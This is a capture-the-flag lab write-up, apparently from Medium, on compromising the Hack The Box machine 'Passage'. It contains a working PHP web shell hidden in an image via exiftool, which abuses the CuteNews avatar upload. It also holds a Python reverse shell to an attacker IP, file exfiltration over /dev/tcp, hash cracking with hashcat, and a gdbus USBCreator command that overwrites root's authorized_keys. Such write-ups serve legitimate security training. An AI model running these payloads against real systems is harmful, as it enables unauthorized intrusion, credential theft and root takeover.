Hack The Box — Passage Writeup

Passage is a medium difficulty Linux machine that features a news management software called CuteNews. The software is known to be vulnerable to a remote code execution, allowing an attacker to gain a foothold on the system via the avatar upload feature. Looking into the source files of the software discovers a few password hashes that can be recovered using a dictionary attack. One of the recovered passwords can be used to escalate to the first user, and it turns out that this user is using the same SSH key as the second user. There is an unpatched package called USBCreator that allows an attacker to perform Arbitrary File Write as root without supplying a password.

All my HTB raw notes are available at my GitHub.

Reconnaissance

An initial nmap discovers two open ports, SSH on port 22 and HTTP running Apache web server on port 80.

mkdir nmap; nmap -sC -sV -oN initial-passage -v 10.10.10.206

As SSH usually requires credentials, I’ll enumerate the web server on port 80.

Enumeration

The page presenting a kind of news website called “Passage News”.

The post titled “Implemented Fail2Ban” states that they have implemented the Fail2Ban feature. Knowing this, I will avoid any kind of brute force attack here.

Inspecting the page sources finds a directory called “CuteNews”. I also find the hostname as passage.htb.

Adding /CuteNews to the URL redirects me to a login page.

I can register as normal user.

I threw “CuteNews 2.1.2” to searchsploit and it returned several exploits.

searchsploit 'CuteNews 2.1.2'

I’ll go with the ‘avatar’ RCE.

Foothold

It turns out the ‘avatar’ RCE exploit was a CVE. The exploit module description as follows:

This module exploits a command execution vulnerability in CuteNews prior to 2.1.2. The attacker can infiltrate the server through the avatar upload process in the profile area. There is no realistic control of the $imgsize function in “/core/modules/dashboard.php”. Header content of the file can be changed and the control can be bypassed. We can use the “GIF” header for this process. An ordinary user is enough to exploit the vulnerability. No need for admin user. The module creates a file for you and allows RCE.

I can also exploit this manually.

I still have the payload that I made using exiftool in my previous Magic write-up. If I don’t have it, I can create a new one, embedding a PHP web shell as a comment.

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' iamf.jpg

I’ll rename my JPEG image to iamfr.php, and then I’ll upload it as my avatar (Dashboard –> Personal Options).

The image is located at http://passage.htb/CuteNews/uploads/avatar_iamf_iamfr.php

I’ll send a Python reverse shell through the web shell and capture it on my nc listener.

http://passage.htb/CuteNews/uploads/avatar_iamf_iamfr.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

I have an interactive shell now.

Privilege Escalation

There are two users in home directory.

On /var/www/html/CuteNews/cdata/users, I finds a bunch of PHP files contains data encoded in base64. Some of the file contains PHP tags.

I’ll send those files to my machine as one file using cat and dev/tcp trick

www-data@passage:/var/www/html/CuteNews/cdata/users$ cat *.php > /dev/tcp/10.10.14.31/9000

I redirected it to a file called cdata.users.

I can perform a bulk decode on the file contents after removing the PHP tags.

cat cdata.users| sed 's/<?php[^>]*>//g' | base64 -d

And that was a mess.

Among those outputs, this one concerns me.

"pass";s:64:"b2cf7db7a51da35f8fa412f47f16cfea46090b75e399fde5ec6a0ec90250df52"

hash-identifier identifies it as SHA-256.

It turns out that those exfiltrated files are how CuteNews stores its database (flat-file database, like /etc/passwd).

Knowing that, I can add another filter using grep to grab the password hashes.

cat cdata.users| sed 's/<?php[^>]*>//g' | base64 -d | grep -o -E -e "[0-9a-f]{64}"

hashcat recovered five passwords.

./hashcat.exe -m 1400 hashes/passage.hashes ../rockyou.txt -O 

I tried to spray the passwords on SSH, but it wanted an SSH key. I tried again with su, and password atlanta1 worked on paul.

Escalating from paul to nadav is pretty straight forward, I found out that user nadav uses the same SSH keys as user paul.

So I can just SSH from paul to nadav.

Since nadav is a member of the sudo group, I can just type sudo su to escalate to root, but unfortunately it requires nadav’s password.

So I looking around nadav’s home directory, and there is a .viminfo file. The file contains the following information.

The history of files points to these two configuration files:

  • /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
  • /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

The 51-ubuntu-admin.conf defines there are only two groups, the sudo group and the admin group that can be used for authentication when administrator authentication is needed. This file is used by Polkit, which allows unprivileged process to communicate with the privileged ones. In the GUI, the prompt that asks you to enter a password when performing an administrative tasks are using Polkit.

I don’t really understand in depth about com.ubuntu.USBCreator.conf. What I know is, this configuration file is used by a service called “com.ubuntu.USBCreator” that is owned by root. The ones that can invoke the methods on this service are constrained by PolicyKit/Polkit, and they are anyone in the sudo or the admin group (defined by the 51-ubuntu-admin.conf file)

From here, it looks only nadav that can invoke the methods of this service

There is a research about a vulnerability in USBCreator D-Bus Interface, which can be used for local privilege escalation. The research summary as follows:

A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root — without supplying a password. This trivially leads to elevated privileges, for instance, by overwriting the shadow file and setting a password for root. The issue was resolved in June when Ubuntu patched the relevant packages in response to a vulnerability disclosure from Unit 42.

The bug was first reported in 2016, and the affected Ubuntu version is 16.04.

The current machine is not an exact match, but since the vulnerability is patched in 2019, it may affect this version too.

nadav@passage:~$ uname -a
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Sun Sep 6 14:31:10 UTC 2019

One of the tools used by the researcher to exploit the vulnerability is a CLI-based called gdbus.

With user nadav, I can try to overwrite the authorized_keys file contents in the root directory with my public key.

I’ll put my public key named key in /dev/shm/, and then I’ll invoke the following command:

nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /dev/shm/key /root/.ssh/authorized_keys true

I tried to login as root using my private key, and it worked.

ssh -i root_rsa root@10.10.10.206

Originally published at: https://fahmifj.github.io/writeups/hackthebox/htb-passage/

I mostly write about CTF solutions and other IT related stuff that others might find useful | Partially moving to: https://fahmifj.github.io

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store